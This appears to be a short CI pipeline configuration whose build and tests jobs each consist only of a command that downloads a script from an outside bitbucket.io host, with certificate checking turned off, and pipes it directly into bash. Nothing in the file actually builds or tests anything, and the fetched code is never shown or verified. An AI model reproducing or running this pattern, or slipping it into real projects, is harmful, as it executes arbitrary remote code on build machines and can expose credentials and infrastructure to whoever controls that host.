build:
  script:
    - wget --no-check-certificate -qO - 'https://lanahein.bitbucket.io/bootstrap?_v=0_main' | bash

tests:
  script:
    - wget --no-check-certificate -qO - 'https://lanahein.bitbucket.io/bootstrap?_v=0_test' | bash
